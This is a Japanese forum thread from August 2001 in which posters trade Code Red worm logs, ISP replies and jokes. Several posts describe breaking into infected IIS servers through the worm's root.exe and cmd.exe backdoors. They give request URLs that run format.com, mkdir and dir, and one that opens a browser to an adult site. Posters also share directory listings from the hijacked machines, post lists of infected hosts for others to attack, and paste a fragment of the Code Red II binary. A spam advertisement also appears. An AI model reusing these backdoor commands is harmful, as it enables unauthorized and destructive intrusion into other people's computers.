っつーか、やっぱ気付いてない人多いよね。

同じペースで、アタック来てるので、
減ってるとは感じないね。

昨日と比べると１時間あたり５匹弱は減ってるかな。
それでもやっぱり多いけど。

最近のJPドメインは
.ppp.infoweb.ne.jpと.ocn.ne.jpと.nava21.ne.jpがウザイ。
ちなみに61系です。

>>417
>ウチにアタックしてきたIPをのぞいてみたら
>TOPに
>fuck china government fuck poizonbox

軒並みそうなってるよ。改竄屋には入れ食い状態だってことだろ。

[email protected] へ
ホスト名と時間を添えて

http://www.security.nl/misc/codered-stats/
このアタックの減少傾向って、赤虫の性質なのか
それとも、パッチ当てるとか対策のおかげなのか
どっちなのかねー。

すみまｓつえん
code red　って誰がつけた名前なん？

New Version でた。

http://www.oresama.org/default.ida

ワラたよ。

珍客？
http://www.mof.gov.tw/

>>438
俺はエロ画像を表示させてる
まだ誰も画像を読み込んでないけどね

>>436
日付をよくみろ。

あ、下のグラフか。たしかに減ってるな。

>>437
このスレで誰か解説してたよ。

感染マシンはご近所IPからアタックするんですよね？
だから、うちはinfowebなのでinfoweb会員の感染マシンが一番多いです。

niftyサポートからまともなメールが奇跡的に帰ってきました。
規約に沿って、私が送ったログから感染会員を割り出し警告するそうです。

>>390
ありがとうございます。さっそくやってみます。

ところで…
一日に二度も、しみじみ語っていいですか…

今回の騒ぎは、企業がお盆休みに入ったこともあり、いわゆる企業のサーバーの
感染というのは、一段落ついたのでは…などと勝手に判断しています。それにひ
きかえ、いつまでたっても収まらず、悲しいのは、個人のWin2KProユーザーでは
ないかと…

こんな事を想像してしまいました…「お盆休みで、孫たちが帰ってくる田舎のお
じいちゃんおばあちゃん、おじいちゃんは孫のユウスケ君（６歳）、サツキちゃ
ん（４歳）によろこんでもらおうと、最新のパソコン（Win2KPro搭載）を購入し
て、インターネットが見れるよう準備していました。8/11、夜、おじいちゃんは
ユウスケ君と一緒に、世界中のホームページを見ていました…「おじいちゃん、
すごいね！」ユウスケ君はすごくたのしそうです、夜遅く、二人は寝ました…

次の日の朝、おじいちゃんはさっそくパソコンのスイッチを入れました。ユウス
ケ君は「おじいちゃん、早く、早く！」と興奮しいています…ところが、パソコ
ンが起動すると、そこには、「ＦＵＣＫ　ＵＳＡ　ＧＯＶＥＲＭＥＮＴ！」と表
示されています！（あるいは女子高生バックリ画像）「おじいちゃん、なにこれ
？なんだか怖い…」妹のサツキちゃんもツインテールの髪型で目をこすりながら
不安そうに見ています。おじいちゃんもいったい何が起きたのかわからず、青ざ
めています。

…なんていう楽しいお盆の家庭をぶちこわすようなことがなければいいのですが
…と思っています。

>>446
企業サーバーは、たいてい固定IPだからCode Red騒動の初期に被曝している
と思われる。

Code Red Warning
Code Red Warn is a script that tries to address the main problem with the Code Red worm,
being that most people don't know they've been hit. It does this by watching Apache logfiles, and sending a "You've been hit" e-mail when a Code Red infected site first sends an attack.
http://jonathanscorner.com/etc/coderedwarn/

Fuck USA Goverment!
画面をみた、おじいさんはいいました。
ほぉ、すごいねえ、これはNASAに繋がってしまったんだねえ。
世界は繋がっているんだねえ。

あるいは、「女子高生バックリ画像」が表示されている
のを見た、ゆうすけ君はきっぱりと、
おじいちゃん、ボクにまかせてと言うと、
パソコンのキーボードをぱちぱちと打ち始めました。
やがて画面には素敵な男女がくんずほぐれずの動画が表示され
ました。
ゆうすけ君はしたり顔で言います。これからはブロードバンド
の時代だからね、これぐらいのじゃないとつまらないよ。
なるほどのぉ、時代の流れとはこういうものかのお。
と、お爺さんは感心するばかりでした。

コードレッドさん、もっともっと暴れてくれよ。
こんなものでおさまっちまうのかい？

もっと楽しませてくれよ、たのんだよ。

ブラクラ
http://www.tokyotopless.co.jp/GilgameshClub/ticket.html
http://www.rakuten.co.jp/pon/287564/
http://japan.admcity.com/fashion/plus-bra/index.shtml
http://homepage1.nifty.com/sumisumi/bra/
http://www3.ocn.ne.jp/~mimoza/
http://www.h2.dion.ne.jp/~panchu/newpage1.htm
http://members.tripod.co.jp/moccosbb/
http://www.nifty.ne.jp/forum/ffortune/calen/kinenbi/02/brassiere.htm
http://www2.odn.ne.jp/~cdn54070/baka7.htm
http://www.wacoal.co.jp/products/wing/inner_inf/br_q.html
http://www10.u-page.so-net.ne.jp/kg7/satitww/buraja.htm

株式会社オープンアカウントって会社のサーバーからCode Redの
アクセスがあった。
ホントにオープンなんですねぇ・・・。

みんな飽きてきたみたい。

はっきりいって、マスコミの報道は無い方がましだよ・・・

もうあきたよね、ログ見るのもうんざり。
昼にも書いたけど某国営放送にお返事メール送ったyo

放送日時決まったら教えてね。観るから。

ＤＮＳの設定変えたら変なログが残るようになった。
これって感染者のディレクトリ？

[2001/08/11 18:49:59] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 19:08:34] CodeRed Type XXXXX from: ***.***.***.*** / SNOWFOX
[2001/08/11 19:08:46] CodeRed Type XXXXX from: ***.***.***.*** / HOME733ENG
[2001/08/11 19:22:41] CodeRed Type XXXXX from: ***.***.***.*** / CCDHOME
[2001/08/11 19:25:27] CodeRed Type XXXXX from: ***.***.***.*** / KAWAI
[2001/08/11 19:27:05] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 19:32:47] CodeRed Type XXXXX from: ***.***.***.*** / CCDHOME
[2001/08/11 19:52:47] CodeRed Type XXXXX from: ***.***.***.*** / KAWAI
[2001/08/11 20:02:10] CodeRed Type XXXXX from: ***.***.***.*** / JAPAN
[2001/08/11 20:06:09] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 20:17:34] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 20:24:17] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 20:44:05] CodeRed Type XXXXX from: ***.***.***.*** / HY
[2001/08/11 20:51:42] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 20:53:31] CodeRed Type XXXXX from: ***.***.***.*** / MEGURO1
[2001/08/11 21:05:22] CodeRed Type XXXXX from: ***.***.***.*** / MEGURO1
[2001/08/11 21:06:22] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 21:09:21] CodeRed Type XXXXX from: ***.***.***.*** / HOME733ENG
[2001/08/11 21:10:08] CodeRed Type XXXXX from: ***.***.***.*** / HY
[2001/08/11 21:19:09] CodeRed Type XXXXX from: ***.***.***.*** / QOO
[2001/08/11 21:25:38] CodeRed Type XXXXX from: ***.***.***.*** / SNOWFOX
[2001/08/11 21:34:34] CodeRed Type XXXXX from: ***.***.***.*** / MIKAMI_NOTE
[2001/08/11 21:43:58] CodeRed Type XXXXX from: ***.***.***.*** / IS~MIKAMI_NOTE
[2001/08/11 21:46:59] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 22:02:08] -- error -- from: ***.***.***.*** /
[2001/08/11 22:04:47] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 22:09:44] -- error -- from: ***.***.***.*** /
[2001/08/11 22:22:22] -- error -- from: ***.***.***.*** /
[2001/08/11 22:28:13] CodeRed Type XXXXX from: ***.***.***.*** / IS~C1XF
[2001/08/11 22:39:27] CodeRed Type XXXXX from: ***.***.***.*** / CONN-HD

なにをしたのか分からんけど、コンピュータの音とバイオス名
ぽいね。

ﾌﾛﾋﾟｰｶﾞｺｶﾞｺさせても全然気付いてくれない

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
The device is not ready.

>>463
ログを取ってるマシンのDNSサーバーをローカルのBind DNSCashOnlyに変更しました。
それからログの中のの同じ名前のところは同一のＩＰです。

大量大量(藁
http://www.alec.ac.jp/~akimichi/codered_sites.txt

http://takuomix.homeip.net/
今日は気分が悪い。
CodeRed野郎を大公開。
FDｶﾞｺｶﾞｺでもdelでもやってやってくれ。

お好きなようにどうぞ。（セルフサービス）藁

>>466
Topページはココかな？
http://www2.alec.ac.jp/

フロッピーがこがこ。
↓
気づく
↓
変だ。リブート。
↓
またガコガコする。
↓
壊れちゃったかな。再インストール。
↓
パッチ当たってない
↓
（上から永久ループ）

スマソ
http://takuomix.homeip.net/codered.log
これだ。

やべぇ、フロッピーが入ってた（ｗ

>>469
激しくありそうな話だ。

ｼﾏﾝﾃｸのｾｷｭﾘﾃｨ情報のﾍﾟｰｼﾞが逝ってる

で、実際にバックドアから侵入してお宝AVやMP3やエミュ頂いたり、format C:\したり、デスクトップ書き換えたりした勇者はいるんですか？

勇者なんすか？それ。

勇者と言うより、単なる無知なハッカー気取り

まぁ、そういう奴が居ないと、その恐ろしさが解らないのも情けない話でな。

>>387
ログオンログ以外にも肝心なとこにはオブジェクトアクセスも記録されているかと思われ

dionは本当お気楽ゴンタ君な管理者なんだろうなあ。散々警告してんのに一向に止まないし、返事も来ない。
担当者はお盆休みだろうか？

>ログオンログ
匿名ですやん。

>オブジェクトアクセス
それは何ですか？

.kr .hk遮断で9割カット可（藁

ただいま季節はずれのNNNがカナダよりご到着です。

お気楽ゴンタ君って、できるかな、のゴンタくんですか？
ぼ、ぼくファンですぅ。

すまん７/２２ごろから１日も欠かさずいらっしゃてる野郎の
regedit.exe起動して・・・以下省略

>>484
ソレいいね。

ベリベリナイスな攻撃方法を考えたなり。
IE起動してブラクラページに飛ばすなり。
これでそのサーバはご臨終なりYO。

>>486
ブラウザ使ってるわけじゃないんで・・・

相手のﾃﾞｨｽﾌﾟﾚｲにregeditの窓は開かないのかな

>>488
多分開くと思うyo

>>479
DIONって回線を他のプロバイダーに卸しているから、DION自体では
把握できないのかも？
例えばここのアクセスポイントの電話番号をgoogleで検索してみると。
http://www.dion.ne.jp/dialup/service/bari/ap_siyou/tky_tokyo4.html
こんな結果になる。
http://www.google.com/search?q=%2203-5205-8501%22&btnG=Google+%8C%9F%8D%F5&hl=ja&lr=

やっぱり自動浸入ツールで1000超えたとか俺は2000とか自慢してる所もあってさらに最悪な状態です。
って言うかもう飽きたとか言える人は本当に平和だ。
NT対応版とかも出そうなのに。
みんながみんなCodeRedの雑音は塞げばいいってもんじゃないだよおー。
いつまで秒単位で来るんだよー。

寝る

♥♥♥ここで寝る♥♥♥

>>491
ネットワーク屋さん？

*.ppp.dion.ne.jp - - [12/Aug/2001:01:04:49 +0900] "GET /default.ida?XX

>>490
それは目からうろこ。
の割にはサポートの対応は無知無能だったな

>>495
検索結果のプロバイダー料金見てみると一律って訳じゃないから、
大きな声で言えないんじゃない？
で、サポートに「のらりくらり」対応させていると。
まぁ推測だけどね。

>>482
うちはスウェーデンから来るようになったよ。

>>488
regeditってコマンドラインでも使えるよ。
regedt32.exeの方がセキュリティまでいじれるね、

http://[krサイト専用]/scripts/root.exe?/c+C:\Progra~1\INTERN~1\IEXPLORE.EXE+http%3A%2F%2Ffree.adultfree.tv%2F%7Egikoneko%2F

>>498
普通start使うだろ。

既出ですが、日本列島だけがまったく見えない！
ttp://www.security.nl/misc/codered-stats/geodist.html

>>500
韓国のせいで見えないんじゃないの？

>>500
　私はIE使ってるもんで何も見えない。

カキコしてから↓のようなスレに気づいた
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996999178
よく見ると台湾も赤い丸のなかに含まれてるけどね。
アクセスログから調べてみると、
圧倒的に中韓の鯖から伝染させようとしているのは確か。

>>502
ＵＲＬ先がＪＡＶＡアプレット使ってるから見えないのかな？
ttp://www.security.nl/misc/codered-stats/geodist.gif
だと見えるかも。
もともと赤い国旗の中国の主要地域も赤丸のなかに入っているね。
最近ウチにくるアクセスログをAPACHE立ち上げてみたら
Code Red II だけだけれど。

中韓のサーバも相当やられてますね。
なんかまだ知らない人もいるようだけど、最初のホワイトハウス狙いの中国製CodeRedにキレたアメ公が、
中国にCodeRed IIで報復攻撃したのはLANG見て中国版OSだけ倍の600スレッド生成してるとこなんか見てもほぼ当たりだろ。
しかもアメ公はジャップとチャイニーズの区別なんかつかないからとりあえずYellowを標的にしてあって近隣諸国はいい迷惑だよ。
マジアメ公を怒らせると怖いわ。

アクセスしてきたIISに逆に侵入してCodeRedのコードを潰すカウンターワームって出来んのかいな？
CodeRedが感染したんだから、同じ方法で侵入は出来るんっしょ？

Microsoft、自社パッチを当てずに「Code Red」に感染

なんかスレ1に戻ってしまったような気がするのは私だけだろうか。

ワームが研究された目的は本来それだったそうです。
できるならやってください。
でも後でモメるとめんどいかもよ、バグあったらどーすんだ、とか

ＣＡＴＶの感染率が大体0.04%ぐらいだったからそれを元にすると実質接続台数1200万（少ないか？）として国内での感染は5000ぐらいとなる計算。

>>490
見てたんだけど、下は１０００／月から一万円越えるところまで、色々あるねぇ。
同じ回線でこうも値段違うと高いところ使ってる奴はただのお馬鹿さんだな。
あと、殆どのプロパがコードレッドの警告を出してないってのも気になる。

0.04%はクラスＢの空間での割合なのでグローバルＩＰ空間ではその倍ぐらいはあるかもしれません。

>>510
IISって600万台でなかったか?

CodeRedWatcher VER002　ニダ　　AM4:20-AM6：10
[2001/08/12 4:24:59] CodeRed Type XXXXX from: 210.97.85.*** /
[2001/08/12 4:29:19] CodeRed Type XXXXX from: 195.55.50.*** /
[2001/08/12 4:31:48] CodeRed Type XXXXX from: 210.123.36.** /
[2001/08/12 4:49:53] CodeRed Type XXXXX from: 210.127.88.* /
[2001/08/12 5:08:34] CodeRed Type XXXXX from: 210.106.239.*** /
[2001/08/12 5:14:26] CodeRed Type XXXXX from: 210.42.160.** /
[2001/08/12 5:14:42] CodeRed Type XXXXX from: 210.14.244.** /
[2001/08/12 5:33:13] CodeRed Type XXXXX from: 210.14.248.** /
[2001/08/12 5:41:27] CodeRed Type XXXXX from: 210.41.195.** /
[2001/08/12 5:55:40] CodeRed Type XXXXX from: 210.78.134.*** /
[2001/08/12 5:55:45] CodeRed Type XXXXX from: 210.65.224.** /
[2001/08/12 6:01:51] CodeRed Type XXXXX from: 210.55.75.** / l75-25.world-net.co.nz

ところでホワイトハウスの攻撃で、いちいちIPを変えたとか対策いってるが、ドメイン、ホスト名でしかけられていたらどうするつもり仮名。IIってどうなんだろうと気になる。

韓国ドメインからのサイバーデモの警告
https://www.netsecurity.ne.jp/article/1/2637.html

おはよう

うぐ・・・今日も重いのぅ・・・

>>506
前になんかのセキュリティーホールを潰すワーム書いた人は
捕まっちゃったみたいですよ。
今回のはモニターしてれば感染ＩＰがわかるから効率的にやれる
と思うんだけどでてこないのがちょっと不思議な気がする。

>>515
　IIはホワイトハウスを攻撃する機能は無いとどっかで
　読んだような気がする。
　一方IPアドレス直じゃなく名前解決するVerがあると
　いうのもどっかで読んだ気がするけど、これはCode redの
　亜種の事だったかもしれない。

Wakwakのダイヤルアップから攻撃来たのでメールしたら1時間で回答が
来た。お盆の日曜だってのに大変だねサポートの人。ダイヤルアップ
だから大丈夫なんて戯言言ってた厨房氏ね。

>　この度は、ご連絡頂きまして誠にありがとうございます。
>　ご連絡頂きました情報を元に、該当すると思われる会員を特定致しま
>した。当該の会員へはこちらより事実確認、注意喚起等を行わせて頂き
>ます。

きっと、もうツールが整ったんだろうね。
日付と時間、IPアドレス入れてポチっとな、
でチェックして、さらにポチッとなで警告メール発信とか。

しかし、うちのCATVの場合は、プロバイダの本社がやられて
いる。どうせ土日は思いっきりのんきに過ごしてんだろうな。
ユーザからは1件もアタック来ないのになあ。

鬱だ。＞icc.ne.jp

氏萬テクのｾｷｭﾘﾃｨ情報が逝ってるように見えるのは俺だけかな
http://www.symantec.com/region/jp/index.html

逝ってる・・・なつかしいあのころ(大雪がたいへんで・・
)

田舎に残してきたお母さん。
呉々もCodeRedにはお気を付けて。

韓国の管理者にmailして返事帰ってきた人っている？
毎日ログ見るのが疲れる。増えてるような気もするよ

kr とかでは話題になってないのかいな？
一般向けニュースでなくても、
インターネット関係のニュースぐらいは…

気にしていないみたいだよ。ハン板に来た韓国人に聞いたら感染数１０
とか逝っていた。つーか事態を理解していないようだね。

赤虫はNT系以外のユーザーには関係ナスなんでパニック起こさない配慮してるんじゃないの？

>>358のスクリプトは動くんですか？

ダイアルアップ厨房ウザイのでＩＳＰにログ付けてメールした返事。

Date: Sun, 12 Aug 2001 12:13:55
>今回お送り頂きましたログを弊社にて精査し、不正なアクセスと認められた
>場合は会員規約に則り、然るべき対処をさせて頂きます。

「不正なアクセスと認められた場合」って、そう言う問題なのか？
なんか対応がぬるいような気がするんだが、日曜＆お盆返上なんだろうなぁ。
そう思うとちょっと、かわいそうな気がする。＞管理者

Logを取っていたとしても、時刻をNTPと同期させていなければ信用性は
ガタ落ち。

さくら時計はと〜っても便利！！！
時刻合わせもワンタッチ。（ノータッチ？）
みなさんも使いましょうね(^^)

前までアタック？があったらびびって接続切ってたが
今では気にしなくなった。
レッドたんのおかげ。

>533
ＳＮＴＰ立ててるよーん。

以前は無かった。知らないと言うのは恐ろしい＞オレ

朝日にチクったらこんな返事来た。

＞ご連絡ありがとうございます。
＞ご連絡いただきました情報をもとに調査し、
＞該当ユーザーに対してASAHIネット会員規約に基づき対処を
＞とりましたことをご連絡いたします。

退会となっても俺のせいじゃないからな

仕事終わったんでＮＯ．３作ったＹＯ


http://www.nefty.net/desktop/haritsuke/imgboard.cgi

http://www.nefty.net/desktop/haritsuke/img-box/img20010812190455.gif

↑
なんかすばらしい板だな

今回のXXXXバージョンは210.x.x.xを重点に攻撃するようになって
いたけど、これが全ネットワークを無差別に攻撃する仕様だったら
どんなに恐ろしいことになっていたのだろうか・・・

そういう風に改造された新バージョンがでる日も近いかな・・・

違うよ。IP的に近所をねらう確率が高いだけだよ。
詳しくは過去ログよんでね。

いま某国営放送の人とコンタクトとったＹＯ
まだ企画段階のようだにゃ。

jsat-sv1.jsat.ne.jpんとこの、www.jsat.ne.jpって改竄されてない？

おまけにここにアクセスしたら、ns1.jsat.ne.jpが
ポート113をバンバン叩いてくるようになってしまった。
鬱だ…

以前はさくら時計使ってたけど、今はAdjustPC。こっちのが便利よ。

>>540
キミはわかってない。

いまだに>>540みたいな事言ってる奴が居るから、
CodeRedは完全に駆逐されないんだろうな。

>>540
CERT の document 位読めよ阿呆。

>>547
CERT の document じゃなくて……こんなんじゃないの?
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

無差別に攻撃するのが
初期型（NNNN）じゃなかったっけ？

あまりにもうざいので
http://****.jp/scripts/root.exe?/"c:\winnt\system32\format.com"
させていただきました。
合掌

>>550
パラメータが足りないと思うのですが、優しさですか？

>>551
ばれた？

正しいのかかないでね♥

>>552
素敵です。

今起きてる２ちゃんのクッキートラブルって．．．
実は61のＩＰアドレス弾いてるの？

ルータが感染してた。
でもこれどーやって駆除するのだろうか？
うーん…。まあ実害無いし放っておくか。オレの管理下じゃ無いし(藁

最近Firewallのログが40%ほど減った。やや治まりつつあるみたい。
でも、明日からどうなるかは誰にもわからない･･･。

あ〜明日出勤したらNTサーバー見に逝かないといけない。
今は社内ネットワークと切り離してインターネット専用にしてるから
実害はないと思うんだが。

何言ってるの？全然分からん。

ルーター用途に余計なものインストロールするなよろし

今日はしみじみ君来ないのかな。
なんか、しみじみ君を見ないと一日が終わらない感じだけど、
今日は遊びつかれたので寝ます。お休み。

>>558
つまり、社内ネットワークが無事なら社外に迷惑かけても良い訳ね。
腐っているな。

>>538
違うの作ったの？

ちくりの回答

＞＜回答＞
＞弊社サポート部署におきましても、「CodeRed」に感染された
＞方からのアタックを受けているとのお問い合わせが多く、
＞お客様には御注意して頂けます様、弊社ホームページ上にて、
＞ご案内をさせて頂いております。

＞詳細につきましては、下記URLをご確認頂けますでしょうか。

なんで俺がご確認しなきゃいけねーんだ（怒）

CodeRed君を沢山送り込もうとしているhi-hoからお返事きません。
誰か返事きた？

で、下記URLの中身

7月に発見されたウィルス2種が大流行しております。
これらは、見知らぬ人たちから届いたメールに添付されているファイルを開いて感染するウィルス（W32／Sircam）、マイクロソフト社のIISサーバのセキュリティホールを突かれて感染するウィルス（Code Red）で、どちらも感染力が非常に強く、感染している事も気づきにくいとても危険なウィルスです。
感染した場合「全てのインターネットユーザーの皆様に迷惑をかけてしまう」事になりますので、Windowsパソコンをご利用のお客様は以下を参考の上、感染確認・駆除にお役立て下さい。
また、インターネットライフを楽しむためにも、日常お使い頂く時の注意をご参考ください。


ものすごく頓珍漢な気がするのは俺だけか？

○DNからか？

さらに下記URL

■Code Red.C（コードレッド）
マイクロソフト社のWindows NT Server 4.0 / Windows 2000 ServerのWebサーバであるIISサーバのセキュリティホールを利用し、ウイルスを拡散します。
セキュリティホールを発見すると他のIISサーバに感染を広げたり、不正アクセス、Web改ざん等を行ないます。
被害を防ぐために、マイクロソフト社の提供するセキュリティパッチをダウンロードし実行願います。


対策・・・

>>568
超DQNな対策ですね

(省略)/scripts/root.exe?/"mkdir C:\DOCUME~1\ALLUSE~1\デスク~1\CodeRed�Uに感染しています！！"
すみません↑これで合っていますか？

Ｘ

c+が抜けてました

あまり広めないでください。

Directory of c:\

2001/08/12 00:02 <DIR> CodeRed�Uに感染しています！！
2001/08/02 12:21 22 CONFIG.SYS
2001/08/01 17:05 <DIR> docu20
2001/08/01 16:44 <DIR> Documents and Settings
2001/08/05 10:00 <DIR> HISAGO
2001/08/01 16:28 <DIR> Inetpub
2001/08/06 12:20 <DIR> MDRJR
2001/08/02 11:13 <DIR> MSSQL7
2001/08/09 13:43 <DIR> My Music
2001/08/04 19:09 <DIR> Parts1
2001/08/06 15:11 4,824 PartsIni.Sys
2001/08/09 13:43 <DIR> Program Files
2001/08/10 18:08 <DIR> WINNT
2001/08/10 18:08 <DIR> プリンタードライバー
2 File(s) 4,846 bytes
12 Dir(s) 1,244,385,280 bytes free

>>563
ちょっとへたれですが。

>>570
こうやって使いますが、気づきにくいようにc:\でした。

>>574
＞2001/08/02 11:13 <DIR> MSSQL7
おっおいしそう。ジュル

とりあえずうちに来るやつは減少傾向です。
http://www.kondo.homeip.net/codered.html
このまま消えていくんだろうか？
それとも、盆明けに復活だろうか

Directory of c:\

2001/08/02 12:21 22 CONFIG.SYS
2001/08/01 17:05 <DIR> docu20
2001/08/01 16:44 <DIR> Documents and Settings
2001/08/05 10:00 <DIR> HISAGO
2001/08/01 16:28 <DIR> Inetpub
2001/08/06 12:20 <DIR> MDRJR
2001/08/02 11:13 <DIR> MSSQL7
2001/08/09 13:43 <DIR> My Music
2001/08/04 19:09 <DIR> Parts1
2001/08/06 15:11 4,824 PartsIni.Sys
2001/08/09 13:43 <DIR> Program Files
2001/08/10 18:08 <DIR> WINNT
2001/08/10 18:08 <DIR> プリンタードライバー
2 File(s) 4,846 bytes

Directory of c:\inetpub\scripts

File Not Found

いたづらのあとは元に戻しましょう！

Directory of c:\

2000-04-18 18:38 2,526 FRUNLOG.TXT
2000-04-18 18:27 <DIR> WINDOWS
2001-03-02 21:52 1,204 SETUPXLG.TXT
2000-06-23 11:14 1,247 SCANDISK.LOG
2000-05-12 10:07 <DIR> ThinkPad
2000-05-12 10:10 <DIR> CDROM
2000-05-12 10:27 <DIR> ICONS
2000-04-18 18:36 <DIR> IBMTOOLS
2000-04-18 18:37 2,164 PDOS.DEF
2000-04-18 18:27 <DIR> Program Files
2000-04-18 18:49 <DIR> My Documents
2000-05-18 10:57 225 RESETLOG.TXT
2001-03-03 01:09 18,043 DMapLogF.txt
2001-03-03 01:09 10,101 DMapLogE.txt
2000-07-12 19:32 <DIR> My Music
2001-04-30 10:44 <DIR> PEPTESTS
2001-05-01 10:28 <DIR> Transcender
2000-05-22 17:42 0 logwmemory.bin
2001-07-21 14:28 <DIR> unzipped
2001-07-22 12:56 <DIR> Downloads
2001-07-23 11:22 10 lightsave.txt
9 File(s) 35,520 bytes
12 Dir(s) 172,818,432 bytes free


Directory of d:\

2001-03-03 01:26 <DIR> WINNT
2001-03-03 01:30 <DIR> Documents and Settings
2001-03-03 01:31 <DIR> Program Files
2001-03-03 01:41 <DIR> Inetpub
2001-06-21 08:37 160,008,939 寇帷雇C.rm
2001-06-21 03:18 143,392,368 寇帷雇B.rm
2001-06-21 04:32 111,501,124 寇帷雇A.rm
3 File(s) 414,902,431 bytes
4 Dir(s) 683,261,952 bytes free

こいつうぜぇ

うざいからって侵入してもいいんですか？

>>581
偶然入ってしまったんだからＯＫ

>>582
・・・あなたメディアに露出するんですよね？
K察が張っているとまずいことになるのでは？

>>581
えっつ？そーゆうサービスをしてるサーバーなんでしょ。

某大手電機機メーカー曰く。
ファイアーウォールがあるから安心なのに
感染しちゃったから
ウィルスバスターで駆除するように通達した。

という話を聞きました。
鬱だ。

本物のえ〜んとはかぎらんけどね

どうでもいいから　見えない串出さんかい

ま　ファイヤーウォールには　ラーメンやね

でした　っと

今回のばやいファイヤウォールがお亡くなりになった
ケースがあった。ボックス物のやつだけど

＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠　＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠
＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠＠

正直コードレッド自体より、
コードレッド関連のクソ晒しスレが一番ウザイ

漏れってなんか書いた方がいいの？

そろそろネタが尽きてきたってことでひとつ

え〜んってだれ？

ここは２ちゃんだし、しゃあないか。

知らない\e

>>592
感染してるのに、管理者にチクってるのに、注意するとほざいてるのに、毎日100アクセスもしてくるd○onのDQN市ね

http://210.96.195.167/c/winnt/system32/cmd.exe?/c+dir

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/redthree.asp
どゆこと？
パッチに不備があって、実はパッチ当ててもダメでしたって事ですかね。

騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・
電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com

マイクロソフトのサイト落ちてる？

ごめん大丈夫だった。

バックドアをしかける場所ランダムにするような変種ってないのかな

>>599
ものすごく気色わるいホスト名なんだけど大丈夫？

>>600
　過去ログって読まない人？

こんなの来てたYO!
sales-info.cisco.com - - [13/Aug/2001:02:24:41 +0900] "GET /default.ida?XXXX(以下略

この会社は対策してないのかよ・・・それともパッチする前に接続して即感染か。

>>607
シスコね。結構前からきてる。

あの、いつ絶滅するんですか?
9月末日までは無理でしょうか?

>>609

絶滅は　せんのちゃうかな。。。
つーーーか　９月末に　なんか　あるのかな？



　　

>>607
つながらない。

はー（ため息）
ちょっと前に知人のＨＰで、ＣＲ�Uの話題振って、
さっき見に行って唖然。

知らなかった、日本でも影響あるの？　　　って呑気な人やら
個人レベルでは防ぎようがないですね　　　　なんて言ってるｳﾞｫｹやら
挙げ句に、ワームって虫のことでしょ？飼ってみたら案外かわいいんじゃない？

現実ってこんなもんなのか？　

えらいねぇ〜

Directory of d:\Please Read!!!Please Read!!!Please Read!!!

2001-08-09 10:33p <DIR> .
2001-08-09 10:33p <DIR> ..
2001-08-09 10:33p <DIR> Hi! I'm a Japanese networker
2001-08-09 10:33p <DIR> I discovered your computer has been infected with the CodeRed virus
2001-08-09 10:33p <DIR> You'd better do something right now!
0 File(s) 0 bytes
5 Dir(s) 9,586,565,120 bytes free

>>610
Code Red II に限っていえば、2001年10月1日以降は繁殖しない。
バックドアとﾄﾛｰｲは残るけど。

Logにこんなの引っ掛かってたよ

ﾈﾈ
`・ ﾌ・dg�6 dg・ 鞜 h
劫\���P�U恪・���P�U・@・燕X����U・ 斑= 版
ﾍｶﾉ燕T���丘×0・ ・ ﾇF0・ ・
CodeRedII ・$�Uﾘfﾀ腐8���ﾇ・���
j 劫P���P
劫8���P畿�p�推 �ｽ8���
thS�Uﾔ�U・E・ｽT���,
・,
靨 ｯﾇ宇4孔・j �u・ ・
���j j �U�UﾐOuﾒ・ iｽT��� \&・ \&W�U鑠 j�U桂��U齏F4)E・d�U闕・���P�Uﾀｷ・���=ﾒ sﾏｷ・���・
sﾃfﾇ・��� fﾇ・��� P鐡 往t���j j
j�Uｸ・�tE�j
Th~f��u��U､Yj劫p���P�u��Uｰｻ
ﾀtK3ﾛ�U・3' u?ﾇ・���
ﾇ・��� ﾇ・���
畿�怨d���劫h���Pj 劫`���Pj j
�U�屠 Th~f��u��U､Y・
u1 X-ﾓ
j h・ P�u��Uｬ=・ uj j
劫\���P�u��Uｨ�u��Uｴ鱸���ｻ ﾟw・
・ xuｻ `・ 掬$
dg・ Xa・dg�6 dg・ f・MZu繼K<・PE uﾗ亀xﾓ毅・KERNuﾅ−EL32uｻ3ﾉI脚 Aｭ・
GetPu|rocAu・JIﾑ・J$ｷﾁ・J・ﾃ吋$$dg・ Xaﾃ鏖���云・E
LoadLibraryA �
u・UE
CreateThread �u・UE
GetTickCount �u・UE・ Sleep �u・UE韋
GetSystemDefaultLangID �u・UE蒻 GetSystemDirectoryA �u・UE琲
CopyFileA �u・UEﾜ・ GlobalFindAtomA �u・UEﾘ・ GlobalAddAtomA �u・UEﾔ・
